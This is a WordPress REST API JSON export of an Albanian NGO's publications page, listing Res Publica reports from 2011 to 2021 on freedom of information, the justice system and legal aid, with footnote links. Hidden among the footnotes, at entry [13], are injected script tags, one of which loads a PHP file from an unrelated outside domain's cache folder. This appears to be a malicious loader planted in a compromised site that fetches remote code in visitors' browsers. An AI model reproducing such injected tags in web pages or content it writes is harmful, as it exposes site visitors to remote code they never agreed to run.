{"id":123,"date":"2013-07-12T22:06:37","date_gmt":"2013-07-12T22:06:37","guid":{"rendered":"http:\/\/www.faqeinternet.al\/res\/?page_id=123"},"modified":"2021-12-20T14:02:46","modified_gmt":"2021-12-20T13:02:46","slug":"internship","status":"publish","type":"page","link":"https:\/\/www.respublica.org.al\/web\/?page_id=123","title":{"rendered":"Publikime"},"content":{"rendered":"<p>Gjat\u00eb kryerjes s\u00eb veprimtaris\u00eb s\u00eb p\u00ebrditshme, Res Publica ka publikuar punime te ndryshme shkencore dhe per perdorim me te gjere, me titujt e meposhtem:<\/p>\n<p><strong>2011<\/strong><\/p>\n<ul>\n<li><strong><em>Respublicata<a href=\"#_ftn1\" name=\"_ftnref1\"><strong>[1]<\/strong><\/a><\/em><\/strong>, nr. 1 \u2013 4 (periodike)<\/li>\n<\/ul>\n<p><strong>2013<\/strong><strong>\u00a0<\/strong><\/p>\n<ul>\n<li><strong><em>Liria e shprehjes, nga teoria n\u00eb praktik\u00eb<a href=\"#_ftn2\" name=\"_ftnref2\"><strong>[2]<\/strong><\/a><\/em><\/strong> (Freedom of Expression: from theory to practice)<\/li>\n<\/ul>\n<p><strong>2014<\/strong><\/p>\n<ul>\n<li><strong><em>Legal Leaks Toolkit<a href=\"#_ftn3\" name=\"_ftnref3\"><strong>[3]<\/strong><\/a><\/em><\/strong>, Albanian version (original publication by OSCE \/ Access Info)<\/li>\n<li><strong><em>Komentar i ligjit p\u00ebr t\u00eb drejt\u00ebn e informimit<a href=\"#_ftn4\" name=\"_ftnref4\"><strong>[4]<\/strong><\/a><\/em><\/strong> (Commentary on the Law on the Right to Information)<\/li>\n<li><strong><em>K\u00ebshilli i Medias<\/em> <em>si domosdoshm\u00ebri e koh\u00ebs<a href=\"#_ftn5\" name=\"_ftnref5\"><strong>[5]<\/strong><\/a><\/em><\/strong> (Media Council as a contemporary necessity)<\/li>\n<\/ul>\n<p><em>\u00a0<\/em><\/p>\n<p><strong>2015<\/strong><\/p>\n<ul>\n<li><strong><em>Legal Leaks Toolkit<\/em><\/strong> (updated)<a href=\"#_ftn6\" name=\"_ftnref6\">[6]<\/a>, Albanian version (original publication by OSCE \/ Access Info)<\/li>\n<li><strong><em>Komentar i ligjit p\u00ebr t\u00eb drejt\u00ebn e informimit, s\u00eb bashku me praktik\u00ebn e Komisionerit p\u00ebr t\u00eb Drejt\u00ebn e Informimit<a href=\"#_ftn7\" name=\"_ftnref7\"><strong>[7]<\/strong><\/a><\/em><\/strong> (Commentary on the Law on the Right to Information, with reference to the case law of the Commissioner on the Right to Information)<\/li>\n<li><strong><em>E drejta e strehimit dhe siguria e streh\u00ebs<a href=\"#_ftn8\" name=\"_ftnref8\"><strong>[8]<\/strong><\/a><\/em><\/strong> (Right to housing and security of tenure)<\/li>\n<li><strong><em>E drejta e informimit n\u00eb bankoprov\u00eb<a href=\"#_ftn9\" name=\"_ftnref9\"><strong>[9]<\/strong><\/a><\/em><\/strong> (Benchmarking the right to freedom of information)<\/li>\n<li><strong><em>Pand\u00ebshkueshm\u00ebria n\u00eb procedimet disiplinore n\u00eb K\u00ebshillin e Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb<a href=\"#_ftn10\" name=\"_ftnref10\"><strong>[10]<\/strong><\/a><\/em><\/strong> (Impunity in High Council of Justice disciplinary proceedings)<\/li>\n<li><strong><em>Pand\u00ebshkueshm\u00ebria n\u00eb prokurimet publike<a href=\"#_ftn11\" name=\"_ftnref11\"><strong>[11]<\/strong><\/a><\/em><\/strong> (Impunity in Public Procurement Procedures)<\/li>\n<\/ul>\n<p><em>\u00a0<\/em><\/p>\n<p><strong>2016<\/strong><\/p>\n<ul>\n<li><strong><em>Efektiviteti i ndihm\u00ebs juridike n\u00eb procesin penal n\u00eb Shqip\u00ebri<a href=\"#_ftn12\" name=\"_ftnref12\"><strong>[12]<\/strong><\/a><\/em><\/strong> (Effectiveness of free legal aid in criminal proceedings in Albania)<\/li>\n<li><strong><em>Pand\u00ebshkueshm\u00ebria n\u00eb procedimet disiplinore n\u00eb K\u00ebshillin e Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb<a href=\"#_ftn13\" name=\"_ftnref12\">[13]<\/a>\u00a0<\/em><\/strong><em>(Impunity in High Council of Justice disciplinary proceedings)<\/em><\/li>\n<li><strong>Konsultimi publik \u2013 Sfidat e vitit te pare te zbatimit te ligjit <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/konsultimi-publik-sfidat-e-vitit-te\">[14]<\/a><\/strong> (<em>Public consultation &#8211; Challenges of the first year of law enforcement)<\/em><\/li>\n<li><strong>E drejta e informimit 2016 \u2013 Studim krahasues <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/e-drejta-e-informimit-2016-studim-k\">[15]<\/a><\/strong> (Right to information 2016 &#8211; Comparative study)<\/li>\n<\/ul>\n<p class=\"entry_title\">2017<\/p>\n<ul>\n<li><strong>Indeksi i transparences 2017 <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/raport-indeksi-i-transparences-2017\">[16]<\/a>\u00a0 <\/strong>(Transparency Index 2017)<\/li>\n<li><strong>Efektiviteti i kall\u00ebzimeve penale nga KLSH <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/efektiviteti-i-kallezimeve-penale-t\">[17]<\/a>\u00a0 <\/strong>(Effectiveness of criminal reports from KLSH)<\/li>\n<\/ul>\n<p>2018<\/p>\n<ul>\n<li><strong>Effectiveness of legal aid in criminal proceedings in Albania <a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2018\/09\/Effectiveness-of-legal-aid-in-criminal-proceedings-in-Albania-r.pdf\">[18]<\/a><\/strong><\/li>\n<li><strong>Raport i permbledhur per zbatimin e ligjit per konsultimin publik 2017-2018 <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/raport_i_permbledhur_per_konsultimi\">[19]<\/a> <\/strong>(Summary report on the implementation of the law on public consultation 2017-2018)<\/li>\n<li><strong>Padit\u00eb kolektive n\u00eb Shqip\u00ebri \u2013 \u00c7far\u00eb pasojash sjell mungesa e tyre? <a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2018\/07\/Studimi-per-padite-kolektive-ok.pdf\">[20<\/a>] <\/strong>(Collective lawsuits in Albania &#8211; What are the consequences of their absence?)<\/li>\n<\/ul>\n<p>2019<\/p>\n<ul>\n<li><strong>E drejta e informimit 2018 \u2013 Informacioni i vonuar \u00ebsht\u00eb informacion i mohuar [<a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2019\/01\/E-drejta-e-informimit-2018-Res-Publica-CRD.pdf\">21<\/a>] \u00a0<\/strong>Right to information 2018 &#8211; Delayed information is denied information<\/li>\n<li><strong>Konsultimi publik n\u00eb Shqip\u00ebri 2017-2018<\/strong>\u00a0 <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/raport_i_permbledhur_per_konsultimi\">[22]<\/a> (Public consultation in Albania 2017-2018)<\/li>\n<li><strong>Marr\u00ebveshjet e faj\u00ebsis\u00eb <a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/10\/marreveshjet-e-fajesise-2019-web.pdf\">[23]\u00a0 <\/a><\/strong>(Guilt agreements)<\/li>\n<\/ul>\n<p>2020<\/p>\n<ul>\n<li><strong>E drejta e informimit 2019 \u2013 Kur Komisioneri p\u00ebr t\u00eb Drejt\u00ebn e Informimit reduktohet n\u00eb monitorues <a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2020\/01\/E-drejta-e-informimit-2019-Res-Publica-web.pdf\">[24]<\/a>\u00a0 <\/strong>(Right to Information 2019 &#8211; When the Commissioner for the Right to Information is reduced to monitors)<\/li>\n<\/ul>\n<p>2021<\/p>\n<ul>\n<li><strong>Anetaresimi i Shqiperise ne BE varet edhe nga standardet e drejtesise penale <a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/03\/Roadmap-to-the-EU-1.8.-alb-final.pdf\">[25]\u00a0 <\/a><\/strong>(Albania&#8217;s membership in the EU also depends on criminal justice standards)<\/li>\n<li><strong>E drejta e informimit 2020 \u2013 Informimi n\u00eb koh\u00eb krize dhe problemet e tjera t\u00eb zakonshme <a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/04\/Raporti-FOI-2020-Res-Publica.pdf\">[26]\u00a0 <\/a><\/strong>(The right to information 2020 &#8211; Information in times of crisis and other common problems)<\/li>\n<li>\n<p align=\"justify\"><span lang=\"sq-AL\">28 Rekomandime p\u00ebr p\u00ebrshpejtimin e trajtimit t\u00eb dosjeve n\u00eb Gjykat\u00eb e Lart\u00eb <a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/12\/28-Rekomandime-per-evadimin-e-dosjeve-nga-Gjykata-e-Larte.pdf\">[27]<\/a> 28 Recommendations for speeding up the processing of files in the High Court<\/span><\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><a href=\"#_ftnref1\" name=\"_ftn1\">[1]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/respublicata_nr_1\">https:\/\/issuu.com\/respublicalb\/docs\/respublicata_nr_1<\/a>;<\/p>\n<p><a href=\"https:\/\/issuu.com\/respublicalb\/docs\/respublicata_nr_2\">https:\/\/issuu.com\/respublicalb\/docs\/respublicata_nr_2<\/a>;<\/p>\n<p><a href=\"https:\/\/issuu.com\/respublicalb\/docs\/respublicata_no.3\">https:\/\/issuu.com\/respublicalb\/docs\/respublicata_no.3<\/a>;<\/p>\n<p><a href=\"https:\/\/issuu.com\/respublicalb\/docs\/respublicata_nr_4\">https:\/\/issuu.com\/respublicalb\/docs\/respublicata_nr_4<\/a>.<\/p>\n<p><a href=\"#_ftnref2\" name=\"_ftn2\">[2]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/freedom_of_speech_ned\">https:\/\/issuu.com\/respublicalb\/docs\/freedom_of_speech_ned<\/a><\/p>\n<p><a href=\"#_ftnref3\" name=\"_ftn3\">[3]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/legal_leaks_albanian\">https:\/\/issuu.com\/respublicalb\/docs\/legal_leaks_albanian<\/a><\/p>\n<p><a href=\"#_ftnref4\" name=\"_ftn4\">[4]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/komentar_foi_web\">https:\/\/issuu.com\/respublicalb\/docs\/komentar_foi_web<\/a><\/p>\n<p><a href=\"#_ftnref5\" name=\"_ftn5\">[5]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/keshilli_i_mediave_-_udhezues\">https:\/\/issuu.com\/respublicalb\/docs\/keshilli_i_mediave_-_udhezues<\/a><\/p>\n<p><a href=\"#_ftnref6\" name=\"_ftn6\">[6]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/legal_leaks_2\">https:\/\/issuu.com\/respublicalb\/docs\/legal_leaks_2<\/a><\/p>\n<p><a href=\"#_ftnref7\" name=\"_ftn7\">[7]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/komentar_foi_me_praktiken_e_kdi_web\">https:\/\/issuu.com\/respublicalb\/docs\/komentar_foi_me_praktiken_e_kdi_web<\/a><\/p>\n<p><a href=\"#_ftnref8\" name=\"_ftn8\">[8]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/e_drejta_e_strehimit_dhe_siguria_e_\">https:\/\/issuu.com\/respublicalb\/docs\/e_drejta_e_strehimit_dhe_siguria_e_<\/a><\/p>\n<p><a href=\"#_ftnref9\" name=\"_ftn9\">[9]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/e_drejta_e_informimit_ne_bankoprove\">https:\/\/issuu.com\/respublicalb\/docs\/e_drejta_e_informimit_ne_bankoprove<\/a><\/p>\n<p><a href=\"#_ftnref10\" name=\"_ftn10\">[10]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/studim_kld_web\">https:\/\/issuu.com\/respublicalb\/docs\/studim_kld_web<\/a><\/p>\n<p><a href=\"#_ftnref11\" name=\"_ftn11\">[11]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/libri_kpp_per_web_ok\">https:\/\/issuu.com\/respublicalb\/docs\/libri_kpp_per_web_ok<\/a><\/p>\n<p><a href=\"#_ftnref12\" name=\"_ftn12\">[12]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/efektiviteti_i_ndihmes_juridike_ne_\">https:\/\/issuu.com\/respublicalb\/docs\/efektiviteti_i_ndihmes_juridike_ne_<\/a><\/p>\n<p><a href=\"#_ftnref12\" name=\"_ftn12\">[13]<\/a> <a href=\"https:\/\/issuu.com\/respublicalb\/docs\/pandeshkueshmeria_ne_procedimet_dis\">https:\/\/issuu.com\/respublicalb\/docs\/pandeshkueshmeria_ne_procedimet_dis<\/a><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n<p><a href=\"https:\/\/issuu.com\/respublicalb\/docs\/konsultimi-publik-sfidat-e-vitit-te\">[14] https:\/\/issuu.com\/respublicalb\/docs\/konsultimi-publik-sfidat-e-vitit-te<\/a><\/p>\n<p><a href=\"https:\/\/issuu.com\/respublicalb\/docs\/e-drejta-e-informimit-2016-studim-k\">[15] https:\/\/issuu.com\/respublicalb\/docs\/e-drejta-e-informimit-2016-studim-k<\/a><\/p>\n<p><a href=\"https:\/\/issuu.com\/respublicalb\/docs\/raport-indeksi-i-transparences-2017\">[16] https:\/\/issuu.com\/respublicalb\/docs\/raport-indeksi-i-transparences-2017<\/a><\/p>\n<p><a href=\"https:\/\/issuu.com\/respublicalb\/docs\/efektiviteti-i-kallezimeve-penale-t\">[17] https:\/\/issuu.com\/respublicalb\/docs\/efektiviteti-i-kallezimeve-penale-t<\/a><\/p>\n<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2018\/09\/Effectiveness-of-legal-aid-in-criminal-proceedings-in-Albania-r.pdf\">[18] http:\/\/www.respublica.org.al\/wp-content\/uploads\/2018\/09\/Effectiveness-of-legal-aid-in-criminal-proceedings-in-Albania-r.pdf<\/a><\/p>\n<p><a href=\"https:\/\/issuu.com\/respublicalb\/docs\/raport_i_permbledhur_per_konsultimi\">[19] https:\/\/issuu.com\/respublicalb\/docs\/raport_i_permbledhur_per_konsultimi<\/a><\/p>\n<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2018\/07\/Studimi-per-padite-kolektive-ok.pdf\">[20] http:\/\/www.respublica.org.al\/wp-content\/uploads\/2018\/07\/Studimi-per-padite-kolektive-ok.pdf<\/a><\/p>\n<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2019\/01\/E-drejta-e-informimit-2018-Res-Publica-CRD.pdf\">[21] http:\/\/www.respublica.org.al\/wp-content\/uploads\/2019\/01\/E-drejta-e-informimit-2018-Res-Publica-CRD.pdf<\/a><\/p>\n<p><a href=\"https:\/\/issuu.com\/respublicalb\/docs\/raport_i_permbledhur_per_konsultimi\">[22] https:\/\/issuu.com\/respublicalb\/docs\/raport_i_permbledhur_per_konsultimi<\/a><\/p>\n<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/10\/marreveshjet-e-fajesise-2019-web.pdf\">[23] http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/10\/marreveshjet-e-fajesise-2019-web.pdf<\/a><\/p>\n<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2020\/01\/E-drejta-e-informimit-2019-Res-Publica-web.pdf\">[24] http:\/\/www.respublica.org.al\/wp-content\/uploads\/2020\/01\/E-drejta-e-informimit-2019-Res-Publica-web.pdf<\/a><\/p>\n<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/03\/Roadmap-to-the-EU-1.8.-alb-final.pdf\">[25] http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/03\/Roadmap-to-the-EU-1.8.-alb-final.pdf<\/a><\/p>\n<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/04\/Raporti-FOI-2020-Res-Publica.pdf\">[26] http:\/\/www.respublica.org.al\/wp-content\/uploads\/2021\/04\/Raporti-FOI-2020-Res-Publica.pdf<\/a><\/p>\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gjat\u00eb kryerjes s\u00eb veprimtaris\u00eb s\u00eb p\u00ebrditshme, Res Publica ka publikuar punime te ndryshme shkencore dhe per perdorim me te gjere, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/123"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=123"}],"version-history":[{"count":15,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/123\/revisions"}],"predecessor-version":[{"id":2052,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/123\/revisions\/2052"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}